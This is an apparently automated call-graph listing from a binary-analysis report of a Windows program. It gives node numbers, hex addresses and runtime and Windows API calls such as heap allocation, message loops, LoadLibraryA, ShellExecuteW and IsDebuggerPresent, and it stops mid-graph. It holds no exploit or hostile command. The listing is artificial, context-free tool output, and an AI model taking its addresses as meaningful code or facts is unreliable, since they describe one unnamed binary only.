92842->92849 92850 30add7 GetFileType 92842->92850 92843 30aec9 GetStdHandle 92843->92846 92844 306986 __calloc_crt 47 API calls 92844->92848 92845 30aedb GetFileType 92845->92846 92846->92840 92846->92843 92846->92845 92847 30af08 InitializeCriticalSectionAndSpinCount 92846->92847 92847->92846 92848->92842 92848->92844 92848->92846 92849->92842 92850->92842 92850->92849 92852 305ead 92851->92852 92854 312e8e 92851->92854 92858 312a7b GetModuleFileNameW 92852->92858 92963 3069d0 47 API calls __crtGetStringTypeA_stat 92854->92963 92856 312eb4 ___crtGetEnvironmentStringsW 92857 312eca FreeEnvironmentStringsW 92856->92857 92857->92852 92859 312aaf _wparse_cmdline 92858->92859 92860 305eb7 92859->92860 92861 312ae9 92859->92861 92860->92792 92898 30115b 47 API calls 3 library calls 92860->92898 92964 3069d0 47 API calls __crtGetStringTypeA_stat 92861->92964 92863 312aef _wparse_cmdline 92863->92860 92865 312ccd __NMSG_WRITE 92864->92865 92869 312cc5 92864->92869 92866 306986 __calloc_crt 47 API calls 92865->92866 92874 312cf6 __NMSG_WRITE 92866->92874 92867 312d4d 92868 301c9d _free 47 API calls 92867->92868 92868->92869 92869->92795 92870 306986 __calloc_crt 47 API calls 92870->92874 92871 312d72 92872 301c9d _free 47 API calls 92871->92872 92872->92869 92874->92867 92874->92869 92874->92870 92874->92871 92875 312d89 92874->92875 92965 312567 47 API calls 2 library calls 92874->92965 92966 306e20 IsProcessorFeaturePresent 92875->92966 92877 312d95 92877->92795 92879 3011a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 92878->92879 92881 3011e0 __IsNonwritableInCurrentImage 92879->92881 92989 300f0a 52 API calls __cinit 92879->92989 92881->92799 92883 2e3a29 92882->92883 92884 351ebf 92882->92884 92885 2e3a63 IsThemeActive 92883->92885 92990 301405 92885->92990 92889 2e3a8f 93002 2e3adb SystemParametersInfoW SystemParametersInfoW 92889->93002 92891 2e3a9b 93003 2e3d19 92891->93003 92893 2e3aa3 SystemParametersInfoW 92894 2e3ac8 92893->92894 
92894->92803 92895->92777 92896->92781 92897->92788 92901->92804 92902->92807 92903->92813 92904->92815 92905->92819 92906->92820 92909 30698d 92907->92909 92910 3069ca 92909->92910 92911 3069ab Sleep 92909->92911 92916 3130aa 92909->92916 92910->92824 92913 307ec9 TlsSetValue 92910->92913 92912 3069c2 92911->92912 92912->92909 92912->92910 92913->92828 92914->92831 92915->92827 92917 3130d0 __calloc_impl 92916->92917 92918 3130b5 92916->92918 92920 3130e0 RtlAllocateHeap 92917->92920 92922 3130c6 92917->92922 92918->92917 92919 3130c1 92918->92919 92923 307c0e 47 API calls __getptd_noexit 92919->92923 92920->92917 92920->92922 92922->92909 92923->92922 92925 307d05 92924->92925 92926 307d18 EnterCriticalSection 92924->92926 92932 307d7c 92925->92932 92926->92835 92928 307d0b 92928->92926 92956 30115b 47 API calls 3 library calls 92928->92956 92931->92839 92933 307d88 type_info::_Type_info_dtor 92932->92933 92934 307d91 92933->92934 92935 307da9 92933->92935 92957 3081c2 47 API calls __NMSG_WRITE 92934->92957 92937 307e11 type_info::_Type_info_dtor 92935->92937 92950 307da7 92935->92950 92937->92928 92938 307d96 92958 30821f 47 API calls 6 library calls 92938->92958 92941 307dbd 92942 307dd3 92941->92942 92943 307dc4 92941->92943 92946 307cf4 __lock 46 API calls 92942->92946 92961 307c0e 47 API calls __getptd_noexit 92943->92961 92944 307d9d 92959 301145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92944->92959 92949 307dda 92946->92949 92948 307dc9 92948->92937 92951 307de9 InitializeCriticalSectionAndSpinCount 92949->92951 92952 307dfe 92949->92952 92950->92935 92960 3069d0 47 API calls __crtGetStringTypeA_stat 92950->92960 92953 307e04 92951->92953 92954 301c9d _free 46 API calls 92952->92954 92962 307e1a LeaveCriticalSection _doexit 92953->92962 92954->92953 92957->92938 92958->92944 92960->92941 92961->92948 92962->92937 92963->92856 92964->92863 92965->92874 92967 306e2b 92966->92967 92972 306cb5 92967->92972 92971 306e46 92971->92877 
92973 306ccf _memset ___raise_securityfailure 92972->92973 92974 306cef IsDebuggerPresent 92973->92974 92980 3081ac SetUnhandledExceptionFilter UnhandledExceptionFilter 92974->92980 92977 306dd6 92979 308197 GetCurrentProcess TerminateProcess 92977->92979 92978 306db3 ___raise_securityfailure 92981 30a70c 92978->92981 92979->92971 92980->92978 92982 30a714 92981->92982 92983 30a716 IsProcessorFeaturePresent 92981->92983 92982->92977 92985 3137b0 92983->92985 92988 31375f 5 API calls 2 library calls 92985->92988 92987 313893 92987->92977 92988->92987 92989->92881 92991 307cf4 __lock 47 API calls 92990->92991 92992 301410 92991->92992 93055 307e58 LeaveCriticalSection 92992->93055 92994 2e3a88 92995 30146d 92994->92995 92996 301491 92995->92996 92997 301477 92995->92997 92996->92889 92997->92996 93056 307c0e 47 API calls __getptd_noexit 92997->93056 92999 301481 93057 306e10 8 API calls ___crtsetenv 92999->93057 93001 30148c 93001->92889 93002->92891 93004 2e3d26 __ftell_nolock 93003->93004 93005 2ed7f7 48 API calls 93004->93005 93006 2e3d31 GetCurrentDirectoryW 93005->93006 93058 2e61ca 93006->93058 93008 2e3d57 IsDebuggerPresent 93009 351cc1 MessageBoxA 93008->93009 93010 2e3d65 93008->93010 93012 351cd9 93009->93012 93010->93012 93013 2e3d82 93010->93013 93041 2e3e3a 93010->93041 93011 2e3e41 SetCurrentDirectoryW 93015 2e3e4e Mailbox 93011->93015 93235 2fc682 48 API calls 93012->93235 93132 2e40e5 93013->93132 93015->92893 93017 351ce9 93022 351cff SetCurrentDirectoryW 93017->93022 93019 2e3da0 GetFullPathNameW 93020 2e6a63 48 API calls 93019->93020 93021 2e3ddb 93020->93021 93148 2e6430 93021->93148 93022->93015 93025 2e3df6 93026 2e3e00 93025->93026 93236 3271fa AllocateAndInitializeSid CheckTokenMembership FreeSid 93025->93236 93164 2e3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93026->93164 93029 351d1c 93029->93026 93032 351d2d 93029->93032 93034 2e5374 50 API calls 93032->93034 93033 2e3e0a 93035 2e3e1f 93033->93035 93233 2e4ffc 67 API 
calls _memset 93033->93233 93037 351d35 93034->93037 93172 2ee8d0 93035->93172 93040 2ece19 48 API calls 93037->93040 93042 351d42 93040->93042 93041->93011 93044 351d6e 93042->93044 93045 351d49 93042->93045 93046 2e518c 48 API calls 93044->93046 93047 2e518c 48 API calls 93045->93047 93054 351d6a GetForegroundWindow ShellExecuteW 93046->93054 93048 351d54 93047->93048 93049 2e510d 48 API calls 93048->93049 93051 351d61 93049->93051 93052 2e518c 48 API calls 93051->93052 93052->93054 93053 351d9e Mailbox 93053->93041 93054->93053 93055->92994 93056->92999 93057->93001 93237 2fe99b 93058->93237 93062 2e61eb 93063 2e5374 50 API calls 93062->93063 93064 2e61ff 93063->93064 93065 2ece19 48 API calls 93064->93065 93066 2e620c 93065->93066 93254 2e39db 93066->93254 93068 2e6216 Mailbox 93069 2e6eed 48 API calls 93068->93069 93070 2e622b 93069->93070 93266 2e9048 93070->93266 93073 2ece19 48 API calls 93074 2e6244 93073->93074 93269 2ed6e9 93074->93269 93076 2e6254 Mailbox 93077 2ece19 48 API calls 93076->93077 93078 2e627c 93077->93078 93079 2ed6e9 55 API calls 93078->93079 93080 2e628f Mailbox 93079->93080 93081 2ece19 48 API calls 93080->93081 93082 2e62a0 93081->93082 93273 2ed645 93082->93273 93084 2e62b2 Mailbox 93085 2ed7f7 48 API calls 93084->93085 93086 2e62c5 93085->93086 93283 2e63fc 93086->93283 93090 2e62df 93091 2e62e9 93090->93091 93092 351c08 93090->93092 93093 300fa7 _W_store_winword 59 API calls 93091->93093 93094 2e63fc 48 API calls 93092->93094 93095 2e62f4 93093->93095 93096 351c1c 93094->93096 93095->93096 93097 2e62fe 93095->93097 93098 2e63fc 48 API calls 93096->93098 93099 300fa7 _W_store_winword 59 API calls 93097->93099 93100 351c38 93098->93100 93101 2e6309 93099->93101 93103 2e5374 50 API calls 93100->93103 93101->93100 93102 2e6313 93101->93102 93104 300fa7 _W_store_winword 59 API calls 93102->93104 93105 351c5d 93103->93105 93106 2e631e 93104->93106 93107 2e63fc 48 API calls 93105->93107 93108 2e635f 93106->93108 93110 351c86 93106->93110 
93112 2e63fc 48 API calls 93106->93112 93111 351c69 93107->93111 93109 2e636c 93108->93109 93108->93110 93299 2fc050 93109->93299 93113 2e6eed 48 API calls 93110->93113 93114 2e6eed 48 API calls 93111->93114 93115 2e6342 93112->93115 93116 351ca8 93113->93116 93118 351c77 93114->93118 93119 2e6eed 48 API calls 93115->93119 93120 2e63fc 48 API calls 93116->93120 93122 2e63fc 48 API calls 93118->93122 93123 2e6350 93119->93123 93124 351cb5 93120->93124 93121 2e6384 93310 2f1b90 93121->93310 93122->93110 93126 2e63fc 48 API calls 93123->93126 93124->93124 93126->93108 93127 2f1b90 48 API calls 93129 2e6394 93127->93129 93129->93127 93130 2e63fc 48 API calls 93129->93130 93131 2e63d6 Mailbox 93129->93131 93326 2e6b68 48 API calls 93129->93326 93130->93129 93131->93008 93133 2e40f2 __ftell_nolock 93132->93133 93134 2e410b 93133->93134 93135 35370e _memset 93133->93135 93136 2e660f 49 API calls 93134->93136 93137 35372a GetOpenFileNameW 93135->93137 93138 2e4114 93136->93138 93139 353779 93137->93139 93854 2e40a7 93138->93854 93141 2e6a63 48 API calls 93139->93141 93143 35378e 93141->93143 93143->93143 93145 2e4129 93872 2e4139 93145->93872 93149 2e643d __ftell_nolock 93148->93149 94082 2e4c75 93149->94082 93151 2e6442 93163 2e3dee 93151->93163 94093 2e5928 86 API calls 93151->94093 93153 2e644f 93153->93163 94094 2e5798 88 API calls Mailbox 93153->94094 93155 2e6458 93156 2e645c GetFullPathNameW 93155->93156 93155->93163 93157 2e6a63 48 API calls 93156->93157 93158 2e6488 93157->93158 93159 2e6a63 48 API calls 93158->93159 93160 2e6495 93159->93160 93161 355dcf _wcscat 93160->93161 93162 2e6a63 48 API calls 93160->93162 93162->93163 93163->93017 93163->93025 93165 2e3ed8 93164->93165 93166 351cba 93164->93166 94097 2e4024 93165->94097 93170 2e3e05 93171 2e36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93170->93171 93171->93033 93173 2ee8f6 93172->93173 93195 2ee906 Mailbox 93172->93195 93175 2eed52 93173->93175 93173->93195 93174 32cc5c 86 API calls 
93174->93195 94198 2fe3cd 346 API calls 93175->94198 93177 2eebc7 93178 2e3e2a 93177->93178 94199 2e2ff6 16 API calls 93177->94199 93178->93041 93234 2e3847 Shell_NotifyIconW _memset 93178->93234 93180 2eed63 93180->93178 93182 2eed70 93180->93182 93181 2ee94c PeekMessageW 93181->93195 94200 2fe312 346 API calls Mailbox 93182->94200 93184 35526e Sleep 93184->93195 93185 2eed77 LockWindowUpdate DestroyWindow GetMessageW 93185->93178 93187 2eeda9 93185->93187 93189 3559ef TranslateMessage DispatchMessageW GetMessageW 93187->93189 93189->93189 93190 355a1f 93189->93190 93190->93178 93191 2eed21 PeekMessageW 93191->93195 93192 2ff4ea 48 API calls 93192->93195 93193 2eebf7 timeGetTime 93193->93195 93195->93174 93195->93177 93195->93181 93195->93184 93195->93191 93195->93192 93195->93193 93196 2e6eed 48 API calls 93195->93196 93197 355557 WaitForSingleObject 93195->93197 93198 2eed3a TranslateMessage DispatchMessageW 93195->93198 93200 2e2aae 322 API calls 93195->93200 93201 35588f Sleep 93195->93201 93203 2eedae timeGetTime 93195->93203 93205 355733 Sleep 93195->93205 93213 355445 Sleep 93195->93213 93219 2e1caa 49 API calls 93195->93219 93229 2ece19 48 API calls 93195->93229 93231 355429 Mailbox 93195->93231 93232 2ed6e9 55 API calls 93195->93232 94102 2ef110 93195->94102 94167 2f45e0 93195->94167 94185 2fe244 93195->94185 94190 2fdc5f 93195->94190 94195 2eeed0 346 API calls Mailbox 93195->94195 94196 2eef00 346 API calls 93195->94196 94197 2f3200 346 API calls 2 library calls 93195->94197 94202 348d23 48 API calls 93195->94202 94206 2efe30 346 API calls __cinit 93195->94206 93196->93195 93197->93195 93202 355574 GetExitCodeProcess CloseHandle 93197->93202 93198->93191 93199 2ed7f7 48 API calls 93199->93231 93200->93195 93201->93231 93202->93195 94201 2e1caa 49 API calls 93203->94201 93205->93231 93208 2fdc38 timeGetTime 93208->93231 93209 355926 GetExitCodeProcess 93211 355952 CloseHandle 93209->93211 93212 35593c WaitForSingleObject 93209->93212 93211->93231 
93212->93195 93212->93211 93213->93195 93214 2e2c79 107 API calls 93214->93231 93216 355432 Sleep 93216->93213 93217 348c4b 108 API calls 93217->93231 93218 3559ae Sleep 93218->93195 93219->93195 93221 2ece19 48 API calls 93221->93231 93225 2ed6e9 55 API calls 93225->93231 93229->93195 93231->93195 93231->93199 93231->93208 93231->93209 93231->93213 93231->93214 93231->93216 93231->93217 93231->93218 93231->93221 93231->93225 94203 324cbe 49 API calls Mailbox 93231->94203 94204 2e1caa 49 API calls 93231->94204 94205 2e2aae 346 API calls 93231->94205 94207 33ccb2 50 API calls 93231->94207 94208 327a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93231->94208 94209 326532 63 API calls 3 library calls 93231->94209 93232->93195 93233->93035 93234->93041 93235->93017 93236->93029 93238 2ed7f7 48 API calls 93237->93238 93239 2e61db 93238->93239 93240 2e6009 93239->93240 93241 2e6016 __ftell_nolock 93240->93241 93242 2e6a63 48 API calls 93241->93242 93247 2e617c Mailbox 93241->93247 93244 2e6048 93242->93244 93253 2e607e Mailbox 93244->93253 93327 2e61a6 93244->93327 93245 2e614f 93246 2ece19 48 API calls 93245->93246 93245->93247 93249 2e6170 93246->93249 93247->93062 93248 2ece19 48 API calls 93248->93253 93250 2e64cf 48 API calls 93249->93250 93250->93247 93251 2e61a6 48 API calls 93251->93253 93252 2e64cf 48 API calls 93252->93253 93253->93245 93253->93247 93253->93248 93253->93251 93253->93252 93330 2e41a9 93254->93330 93257 2e3a06 93257->93068 93260 352ff0 93262 301c9d _free 47 API calls 93260->93262 93263 352ffd 93262->93263 93264 2e4252 84 API calls 93263->93264 93265 353006 93264->93265 93265->93265 93267 2ff4ea 48 API calls 93266->93267 93268 2e6237 93267->93268 93268->93073 93270 2ed6f4 93269->93270 93271 2ed71b 93270->93271 93843 2ed764 55 API calls 93270->93843 93271->93076 93274 2ed654 93273->93274 93282 2ed67e 93273->93282 93275 2ed65b 93274->93275 93277 2ed6c2 93274->93277 93276 2ed666 93275->93276 93281 2ed6ab 
93275->93281 93844 2ed9a0 53 API calls __cinit 93276->93844 93277->93281 93846 2fdce0 53 API calls 93277->93846 93281->93282 93845 2fdce0 53 API calls 93281->93845 93282->93084 93284 2e641f 93283->93284 93285 2e6406 93283->93285 93287 2e6a63 48 API calls 93284->93287 93286 2e6eed 48 API calls 93285->93286 93288 2e62d1 93286->93288 93287->93288 93289 300fa7 93288->93289 93290 300fb3 93289->93290 93291 301028 93289->93291 93298 300fd8 93290->93298 93847 307c0e 47 API calls __getptd_noexit 93290->93847 93849 30103a 59 API calls 4 library calls 93291->93849 93294 301035 93294->93090 93295 300fbf 93848 306e10 8 API calls ___crtsetenv 93295->93848 93297 300fca 93297->93090 93298->93090 93300 2fc064 93299->93300 93302 2fc069 Mailbox 93299->93302 93850 2fc1af 48 API calls 93300->93850 93305 2fc077 93302->93305 93851 2fc15c 48 API calls 93302->93851 93304 2ff4ea 48 API calls 93307 2fc108 93304->93307 93305->93304 93306 2fc152 93305->93306 93306->93121 93308 2ff4ea 48 API calls 93307->93308 93309 2fc113 93308->93309 93309->93121 93311 2f1cf6 93310->93311 93313 2f1ba2 93310->93313 93311->93129 93312 2f1bae 93320 2f1bb9 93312->93320 93853 2fc15c 48 API calls 93312->93853 93313->93312 93315 2ff4ea 48 API calls 93313->93315 93316 3549c4 93315->93316 93318 2ff4ea 48 API calls 93316->93318 93317 2f1c5d 93317->93129 93325 3549cf 93318->93325 93319 2ff4ea 48 API calls 93321 2f1c9f 93319->93321 93320->93317 93320->93319 93322 2f1cb2 93321->93322 93852 2e2925 48 API calls 93321->93852 93322->93129 93324 2ff4ea 48 API calls 93324->93325 93325->93312 93325->93324 93326->93129 93328 2ebdfa 48 API calls 93327->93328 93329 2e61b1 93328->93329 93329->93244 93395 2e4214 93330->93395 93335 354f73 93337 2e4252 84 API calls 93335->93337 93336 2e41d4 LoadLibraryExW 93405 2e4291 93336->93405 93339 354f7a 93337->93339 93341 2e4291 3 API calls 93339->93341 93343 354f82 93341->93343 93431 2e44ed 93343->93431 93344 2e41fb 93344->93343 93345 2e4207 93344->93345 93347 2e4252 84 API calls 93345->93347 
93349 2e39fe 93347->93349 93349->93257 93354 32c396 93349->93354 93351 354fa9 93439 2e4950 93351->93439 93353 354fb6 93355 2e4517 83 API calls 93354->93355 93356 32c405 93355->93356 93617 32c56d 93356->93617 93359 2e44ed 64 API calls 93360 32c432 93359->93360 93361 2e44ed 64 API calls 93360->93361 93362 32c442 93361->93362 93363 2e44ed 64 API calls 93362->93363 93364 32c45d 93363->93364 93365 2e44ed 64 API calls 93364->93365 93366 32c478 93365->93366 93367 2e4517 83 API calls 93366->93367 93368 32c48f 93367->93368 93369 30395c __crtGetStringTypeA_stat 47 API calls 93368->93369 93370 32c496 93369->93370 93371 30395c __crtGetStringTypeA_stat 47 API calls 93370->93371 93372 32c4a0 93371->93372 93373 2e44ed 64 API calls 93372->93373 93374 32c4b4 93373->93374 93375 32bf5a GetSystemTimeAsFileTime 93374->93375 93376 32c4c7 93375->93376 93377 32c4f1 93376->93377 93378 32c4dc 93376->93378 93380 32c556 93377->93380 93381 32c4f7 93377->93381 93379 301c9d _free 47 API calls 93378->93379 93384 32c4e2 93379->93384 93383 301c9d _free 47 API calls 93380->93383 93623 32b965 118 API calls __fcloseall 93381->93623 93386 32c41b 93383->93386 93387 301c9d _free 47 API calls 93384->93387 93385 32c54e 93388 301c9d _free 47 API calls 93385->93388 93386->93260 93389 2e4252 93386->93389 93387->93386 93388->93386 93390 2e425c 93389->93390 93392 2e4263 93389->93392 93624 3035e4 93390->93624 93393 2e4272 93392->93393 93394 2e4283 FreeLibrary 93392->93394 93393->93260 93394->93393 93444 2e4339 93395->93444 93398 2e423c 93399 2e41bb 93398->93399 93400 2e4244 FreeLibrary 93398->93400 93402 303499 93399->93402 93400->93399 93452 3034ae 93402->93452 93404 2e41c8 93404->93335 93404->93336 93531 2e42e4 93405->93531 93408 2e42b8 93409 2e41ec 93408->93409 93410 2e42c1 FreeLibrary 93408->93410 93412 2e4380 93409->93412 93410->93409 93413 2ff4ea 48 API calls 93412->93413 93414 2e4395 93413->93414 93415 2e47b7 48 API calls 93414->93415 93416 2e43a1 ___crtGetEnvironmentStringsW 93415->93416 93417 2e43dc 
93416->93417 93419 2e4499 93416->93419 93420 2e44d1 93416->93420 93418 2e4950 57 API calls 93417->93418 93427 2e43e5 93418->93427 93539 2e406b CreateStreamOnHGlobal 93419->93539 93550 32c750 93 API calls 93420->93550 93423 2e44ed 64 API calls 93423->93427 93425 2e4479 93425->93344 93426 354ed7 93428 2e4517 83 API calls 93426->93428 93427->93423 93427->93425 93427->93426 93545 2e4517 93427->93545 93429 354eeb 93428->93429 93430 2e44ed 64 API calls 93429->93430 93430->93425 93432 2e44ff 93431->93432 93433 354fc0 93431->93433 93574 30381e 93432->93574 93436 32bf5a 93594 32bdb4 93436->93594 93438 32bf70 93438->93351 93440 2e495f 93439->93440 93441 355002 93439->93441 93599 303e65 93440->93599 93443 2e4967 93443->93353 93448 2e434b 93444->93448 93447 2e4321 LoadLibraryA GetProcAddress 93447->93398 93449 2e422f 93448->93449 93450 2e4354 LoadLibraryA 93448->93450 93449->93398 93449->93447 93450->93449 93451 2e4365 GetProcAddress 93450->93451 93451->93449 93455 3034ba type_info::_Type_info_dtor 93452->93455 93453 3034cd 93500 307c0e 47 API calls __getptd_noexit 93453->93500 93455->93453 93457 3034fe 93455->93457 93456 3034d2 93501 306e10 8 API calls ___crtsetenv 93456->93501 93471 30e4c8 93457->93471 93460 303503 93461 303519 93460->93461 93462 30350c 93460->93462 93464 303543 93461->93464 93465 303523 93461->93465 93502 307c0e 47 API calls __getptd_noexit 93462->93502 93485 30e5e0 93464->93485 93503 307c0e 47 API calls __getptd_noexit 93465->93503 93468 3034dd type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 93468->93404 93472 30e4d4 type_info::_Type_info_dtor 93471->93472 93473 307cf4 __lock 47 API calls 93472->93473 93483 30e4e2 93473->93483 93474 30e552 93505 30e5d7 93474->93505 93475 30e559 93510 3069d0 47 API calls __crtGetStringTypeA_stat 93475->93510 93478 30e560 93478->93474 93480 30e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93478->93480 93479 30e5cc type_info::_Type_info_dtor 93479->93460 93480->93474 93481 307d7c __mtinitlocknum 47 API 
calls 93481->93483 93483->93474 93483->93475 93483->93481 93508 304e5b 48 API calls __lock 93483->93508 93509 304ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93483->93509 93493 30e600 __wopenfile 93485->93493 93486 30e61a 93515 307c0e 47 API calls __getptd_noexit 93486->93515 93488 30e61f 93516 306e10 8 API calls ___crtsetenv 93488->93516 93490 30354e 93504 303570 LeaveCriticalSection LeaveCriticalSection _fseek 93490->93504 93491 30e838 93512 3163c9 93491->93512 93493->93486 93499 30e7d5 93493->93499 93517 30185b 59 API calls 3 library calls 93493->93517 93495 30e7ce 93495->93499 93518 30185b 59 API calls 3 library calls 93495->93518 93497 30e7ed 93497->93499 93519 30185b 59 API calls 3 library calls 93497->93519 93499->93486 93499->93491 93500->93456 93501->93468 93502->93468 93503->93468 93504->93468 93511 307e58 LeaveCriticalSection 93505->93511 93507 30e5de 93507->93479 93508->93483 93509->93483 93510->93478 93511->93507 93520 315bb1 93512->93520 93514 3163e2 93514->93490 93515->93488 93516->93490 93517->93495 93518->93497 93519->93499 93523 315bbd type_info::_Type_info_dtor 93520->93523 93521 315bcf 93522 307c0e __dosmaperr 47 API calls 93521->93522 93524 315bd4 93522->93524 93523->93521 93525 315c06 93523->93525 93526 306e10 ___crtsetenv 8 API calls 93524->93526 93527 315c78 __wsopen_helper 110 API calls 93525->93527 93530 315bde type_info::_Type_info_dtor 93526->93530 93528 315c23 93527->93528 93529 315c4c __wsopen_helper LeaveCriticalSection 93528->93529 93529->93530 93530->93514 93535 2e42f6 93531->93535 93534 2e42cc LoadLibraryA GetProcAddress 93534->93408 93536 2e42aa 93535->93536 93537 2e42ff LoadLibraryA 93535->93537 93536->93408 93536->93534 93537->93536 93538 2e4310 GetProcAddress 93537->93538 93538->93536 93540 2e4085 FindResourceExW 93539->93540 93544 2e40a2 93539->93544 93541 354f16 LoadResource 93540->93541 93540->93544 93542 354f2b SizeofResource 93541->93542 93541->93544 93543 354f3f LockResource 93542->93543 93542->93544 93543->93544 
93544->93417 93546 354fe0 93545->93546 93547 2e4526 93545->93547 93551 303a8d 93547->93551 93549 2e4534 93549->93427 93550->93417 93553 303a99 type_info::_Type_info_dtor 93551->93553 93552 303aa7 93564 307c0e 47 API calls __getptd_noexit 93552->93564 93553->93552 93554 303acd 93553->93554 93566 304e1c 93554->93566 93557 303aac 93565 306e10 8 API calls ___crtsetenv 93557->93565 93559 303ad3 93572 3039fe 81 API calls 5 library calls 93559->93572 93560 303ab7 type_info::_Type_info_dtor 93560->93549 93562 303ae2 93573 303b04 LeaveCriticalSection LeaveCriticalSection _fseek 93562->93573 93564->93557 93565->93560 93567 304e2c 93566->93567 93568 304e4e EnterCriticalSection 93566->93568 93567->93568 93569 304e34 93567->93569 93571 304e44 93568->93571 93570 307cf4 __lock 47 API calls 93569->93570 93570->93571 93571->93559 93572->93562 93573->93560 93577 303839 93574->93577 93576 2e4510 93576->93436 93578 303845 type_info::_Type_info_dtor 93577->93578 93579 303888 93578->93579 93580 30385b _memset 93578->93580 93581 303880 type_info::_Type_info_dtor 93578->93581 93582 304e1c __lock_file 48 API calls 93579->93582 93590 307c0e 47 API calls __getptd_noexit 93580->93590 93581->93576 93583 30388e 93582->93583 93592 30365b 62 API calls 7 library calls 93583->93592 93586 303875 93591 306e10 8 API calls ___crtsetenv 93586->93591 93587 3038a4 93593 3038c2 LeaveCriticalSection LeaveCriticalSection _fseek 93587->93593 93590->93586 93591->93581 93592->93587 93593->93581 93597 30344a GetSystemTimeAsFileTime 93594->93597 93596 32bdc3 93596->93438 93598 303478 __aulldiv 93597->93598 93598->93596 93600 303e71 type_info::_Type_info_dtor 93599->93600 93601 303e94 93600->93601 93602 303e7f 93600->93602 93604 304e1c __lock_file 48 API calls 93601->93604 93613 307c0e 47 API calls __getptd_noexit 93602->93613 93606 303e9a 93604->93606 93605 303e84 93614 306e10 8 API calls ___crtsetenv 93605->93614 93615 303b0c 55 API calls 7 library calls 93606->93615 93609 303ea5 93616 303ec5 
LeaveCriticalSection LeaveCriticalSection _fseek 93609->93616 93611 303eb7 93612 303e8f type_info::_Type_info_dtor 93611->93612 93612->93443 93613->93605 93614->93612 93615->93609 93616->93611 93622 32c581 __tzset_nolock _wcscmp 93617->93622 93618 2e44ed 64 API calls 93618->93622 93619 32c417 93619->93359 93619->93386 93620 32bf5a GetSystemTimeAsFileTime 93620->93622 93621 2e4517 83 API calls 93621->93622 93622->93618 93622->93619 93622->93620 93622->93621 93623->93385 93625 3035f0 type_info::_Type_info_dtor 93624->93625 93626 303604 93625->93626 93627 30361c 93625->93627 93653 307c0e 47 API calls __getptd_noexit 93626->93653 93630 304e1c __lock_file 48 API calls 93627->93630 93633 303614 type_info::_Type_info_dtor 93627->93633 93629 303609 93654 306e10 8 API calls ___crtsetenv 93629->93654 93632 30362e 93630->93632 93637 303578 93632->93637 93633->93392 93638 303587 93637->93638 93639 30359b 93637->93639 93696 307c0e 47 API calls __getptd_noexit 93638->93696 93645 303597 93639->93645 93656 302c84 93639->93656 93642 30358c 93697 306e10 8 API calls ___crtsetenv 93642->93697 93655 303653 LeaveCriticalSection LeaveCriticalSection _fseek 93645->93655 93649 3035b5 93673 30e9d2 93649->93673 93651 3035bb 93651->93645 93652 301c9d _free 47 API calls 93651->93652 93652->93645 93653->93629 93654->93633 93655->93633 93657 302c97 93656->93657 93658 302cbb 93656->93658 93657->93658 93659 302933 _fprintf 47 API calls 93657->93659 93662 30eb36 93658->93662 93660 302cb4 93659->93660 93698 30af61 93660->93698 93663 3035af 93662->93663 93664 30eb43 93662->93664 93666 302933 93663->93666 93664->93663 93665 301c9d _free 47 API calls 93664->93665 93665->93663 93667 302952 93666->93667 93668 30293d 93666->93668 93667->93649 93804 307c0e 47 API calls __getptd_noexit 93668->93804 93670 302942 93805 306e10 8 API calls ___crtsetenv 93670->93805 93672 30294d 93672->93649 93674 30e9de type_info::_Type_info_dtor 93673->93674 93675 30e9e6 93674->93675 93680 30e9fe 93674->93680 93821 307bda 47 
API calls __getptd_noexit 93675->93821 93677 30ea7b 93825 307bda 47 API calls __getptd_noexit 93677->93825 93678 30e9eb 93822 307c0e 47 API calls __getptd_noexit 93678->93822 93680->93677 93683 30ea28 93680->93683 93682 30ea80 93826 307c0e 47 API calls __getptd_noexit 93682->93826 93685 30a8ed ___lock_fhandle 49 API calls 93683->93685 93687 30ea2e 93685->93687 93686 30ea88 93827 306e10 8 API calls ___crtsetenv 93686->93827 93689 30ea41 93687->93689 93690 30ea4c 93687->93690 93806 30ea9c 93689->93806 93823 307c0e 47 API calls __getptd_noexit 93690->93823 93691 30e9f3 type_info::_Type_info_dtor 93691->93651 93694 30ea47 93824 30ea73 LeaveCriticalSection __unlock_fhandle 93694->93824 93696->93642 93697->93645 93699 30af6d type_info::_Type_info_dtor 93698->93699 93700 30af75 93699->93700 93703 30af8d 93699->93703 93796 307bda 47 API calls __getptd_noexit 93700->93796 93702 30b022 93801 307bda 47 API calls __getptd_noexit 93702->93801 93703->93702 93708 30afbf 93703->93708 93704 30af7a 93797 307c0e 47 API calls __getptd_noexit 93704->93797 93707 30b027 93802 307c0e 47 API calls __getptd_noexit 93707->93802 93723 30a8ed 93708->93723 93711 30b02f 93803 306e10 8 API calls ___crtsetenv 93711->93803 93712 30afc5 93714 30afd8 93712->93714 93715 30afeb 93712->93715 93732 30b043 93714->93732 93798 307c0e 47 API calls __getptd_noexit 93715->93798 93717 30af82 type_info::_Type_info_dtor 93717->93658 93719 30afe4 93800 30b01a LeaveCriticalSection __unlock_fhandle 93719->93800 93720 30aff0 93799 307bda 47 API calls __getptd_noexit 93720->93799 93724 30a8f9 type_info::_Type_info_dtor 93723->93724 93725 30a946 EnterCriticalSection 93724->93725 93726 307cf4 __lock 47 API calls 93724->93726 93727 30a96c type_info::_Type_info_dtor 93725->93727 93728 30a91d 93726->93728 93727->93712 93729 30a928 InitializeCriticalSectionAndSpinCount 93728->93729 93730 30a93a 93728->93730 93729->93730 93731 30a970 ___lock_fhandle LeaveCriticalSection 93730->93731 93731->93725 93733 30b050 __ftell_nolock 
